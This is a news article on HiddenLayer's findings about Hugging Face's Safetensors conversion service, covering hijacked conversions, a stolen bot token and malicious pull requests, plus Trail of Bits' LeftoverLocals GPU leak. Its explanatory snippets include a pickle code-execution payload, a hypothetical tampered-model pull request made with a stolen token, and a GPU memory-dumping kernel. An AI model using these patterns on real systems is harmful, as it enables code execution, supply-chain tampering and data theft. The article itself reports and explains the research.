Hugging Face Safetensors vulnerable to supply chain attacks

Hugging Face is harmless...right?
7 March 2024

Hugging Face – now with vulnerabilities.

• Hugging Face vulnerabilities revealed.
• Supply chain attacks can target the Hugging Face Safetensors conversion service.
• That means the whole Hugging Face community could be under threat.

Recent research has found that Hugging Face’s Safetensors conversion service is vulnerable to supply chain attacks, with hackers able to hijack AI models submitted by users. Reported by The Hacker News, cybersecurity researchers from HiddenLayer discovered that it is “possible to send malicious pull requests with attacker-controlled data from the Hugging Face service to any repository on the platform.” The researchers also found that it was possible to “hijack any models that are submitted through the conversion service.”

For those who don’t know, Hugging Face is a collaboration platform that software developers use to host and work together on vast numbers of datasets, machine learning models, and applications, many of them pre-trained. Users can build, train, and deploy these as they choose.

Vulnerabilities in Hugging Face

Safetensors is a format designed by Hugging Face to store tensors with security as a priority. Users can also convert PyTorch models to Safetensors through a pull request if desired. It stands in contrast to “pickles,” another format, which malicious actors may have exploited to run unauthorized code and deploy tools such as Mythic and Cobalt Strike.
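
To make the contrast concrete, here is a minimal Python sketch (with a deliberately harmless payload, not a real exploit) of why pickle-based checkpoints are dangerous: unpickling can invoke arbitrary callables, while a safetensors file is just raw tensor bytes plus a JSON header, so loading it executes no code.

```python
import pickle

import torch
from safetensors.torch import load_file, save_file

# Why pickle is risky: whatever __reduce__ returns is CALLED at load time.
class NotAModel:
    def __reduce__(self):
        import os
        return (os.system, ("echo 'this ran during model load'",))

blob = pickle.dumps(NotAModel())
pickle.loads(blob)  # the shell command above runs right here

# Why safetensors is safer: only tensor bytes and metadata are stored,
# so loading is a pure data operation with no code-execution path.
save_file({"weight": torch.zeros(2, 2)}, "model.safetensors")
tensors = load_file("model.safetensors")
print(tensors["weight"].shape)  # torch.Size([2, 2])
```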

The revelation of these vulnerabilities comes as a shock to many of Hugging Face’s 1.2 million registered users. The research showed that malicious pull requests could be made via a hijacked model: because the service is expected to convert the model, attackers can pose as the conversion bot and request changes to any repository on the platform.

It’s also possible for hackers to extract the tokens associated with SFConvertbot, the bot that generates conversion pull requests. With a stolen token, a threat actor could send a malicious pull request to any repository on the Hugging Face site, manipulating the model and even implanting neural backdoors.
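
To see why a leaked bot token is so dangerous, consider this hypothetical sketch using the huggingface_hub client: any holder of a write token can open a pull request against an arbitrary public repository, and one opened with SFConvertbot’s token would look just like a legitimate conversion. The repository name, file names, and token below are placeholders, not details from the research.

```python
from huggingface_hub import CommitOperationAdd, HfApi

# Hypothetical illustration: "hf_..." stands in for a stolen bot token,
# and "some-org/some-model" is a placeholder repository.
api = HfApi(token="hf_...")

api.create_commit(
    repo_id="some-org/some-model",
    operations=[
        CommitOperationAdd(
            path_in_repo="model.safetensors",
            path_or_fileobj="tampered.safetensors",  # attacker-controlled weights
        )
    ],
    commit_message="Convert weights to safetensors",  # mimics the real bot
    create_pr=True,  # arrives as a routine-looking pull request
)
```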

According to researchers, “an attacker could run any arbitrary code any time someone attempted to convert their model.” Essentially, a model could be hijacked upon conversion without the user even knowing it.
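
A minimal sketch of the window the researchers describe: converting a PyTorch checkpoint means loading it first, and torch.load() unpickles by default. The filename below is a placeholder; weights_only is a real PyTorch flag (available since 1.13) that narrows the unpickler to plain tensor data.

```python
import torch

# Placeholder checkpoint so the example is self-contained.
torch.save({"weight": torch.zeros(2, 2)}, "model.bin")

# Risky on untrusted files: a full unpickle can execute attacker code.
state = torch.load("model.bin", map_location="cpu")

# Safer (PyTorch 1.13+): restrict the unpickler to tensors and containers.
state = torch.load("model.bin", map_location="cpu", weights_only=True)
print(state["weight"].shape)
```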

An attack could also result in the theft of a user’s Hugging Face token when they try to convert a repository of their own. Hackers may then be able to access internal models and datasets, opening the door to malicious interference.

The complexities of these vulnerabilities don’t stop there. An adversary could exploit the fact that any user can submit a conversion request for a public repository, potentially modifying or hijacking a widely used model and posing a substantial risk to the overall supply chain. The researchers summed this up by saying, “the conversion service has proven to be vulnerable and has had the potential to cause a widespread supply chain attack via the Hugging Face official service.”

Attackers could also gain access to the container that runs the service and compromise any model it converts.

Hugging Face – traditionally, bad things happen afterwards…

The implications go beyond individual repositories: the overall trustworthiness and reliability of the Hugging Face service and its community are under threat.

Co-founder and CEO of HiddenLayer, Chris “Tito” Sestito, emphasized the effects this vulnerability could have on a wider scale, saying, “This vulnerability extends beyond any single company hosting a model. The compromise of the conversion service has the potential to rapidly affect the millions of users who rely on these models to kick-start their AI projects, creating a full supply chain issue. Users of the Hugging Face platform place trust not only in the models hosted there but also in the reputable companies behind them, such as Google and Microsoft, making them all the more susceptible to this type of attack.”

LeftoverLocals

HiddenLayer’s disclosure comes just one month after Trail of Bits revealed a vulnerability known as LeftoverLocals (CVE-2023-4969, Common Vulnerability Scoring System (CVSS) score: 6.5). This security flaw enables the recovery of data from general-purpose graphics processing units (GPGPUs) made by Apple, AMD, Qualcomm, and Imagination. The CVSS score of 6.5 marks the vulnerability as moderate in severity, but it still puts sensitive data at risk.

The memory leak Trail of Bits found stems from a failure to isolate process memory on the GPU. A local attacker can therefore read memory left behind by other processes, including another user’s interactive session with a large language model (LLM).
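
Trail of Bits demonstrated this with a “listener” kernel that dumps uninitialized GPU local memory. The sketch below is a conceptual reconstruction in Python with pyopencl, not their actual code; on patched or unaffected hardware the output buffer will simply come back zeroed.

```python
import numpy as np
import pyopencl as cl

# A "listener" in the LeftoverLocals style: copy local (on-chip) memory to a
# global buffer WITHOUT initializing it first. On vulnerable GPUs this reveals
# data left behind by whichever kernel ran before -- even another process's.
KERNEL = """
__kernel void listener(__local float *lm, __global float *out, int n) {
    for (int i = get_local_id(0); i < n; i += get_local_size(0))
        out[i] = lm[i];  // lm was never written by this kernel
}
"""

ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)
prog = cl.Program(ctx, KERNEL).build()

n = 4096  # 16 KB of local memory, within typical device limits
out = np.zeros(n, dtype=np.float32)
out_buf = cl.Buffer(ctx, cl.mem_flags.WRITE_ONLY, out.nbytes)

# One work-group of 256 threads strides over the whole local array.
prog.listener(queue, (256,), (256,), cl.LocalMemory(n * 4), out_buf, np.int32(n))
cl.enqueue_copy(queue, out, out_buf)
print(out[:8])  # stale nonzero values here would indicate leaked memory
```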

The Hugging Face vulnerabilities, like the one Trail of Bits uncovered, only emphasize the need for stricter security protocols in AI technologies. Currently, AI adoption is growing at such a rate that security measures cannot keep up. HiddenLayer is one company creating solutions for these shortcomings, with its AISec platform offering a range of products designed to protect ML models against malicious code injection and other attacks.

Nevertheless, the revelation of the issues with Hugging Face’s Safetensors conversion tool is a stark reminder of the challenges facing the AI and machine learning sectors. Supply chain attacks put the integrity of AI models at risk, along with the ecosystems that rely on them. Investigations into the vulnerability are continuing, with the machine learning community on high alert and more vigilant than ever.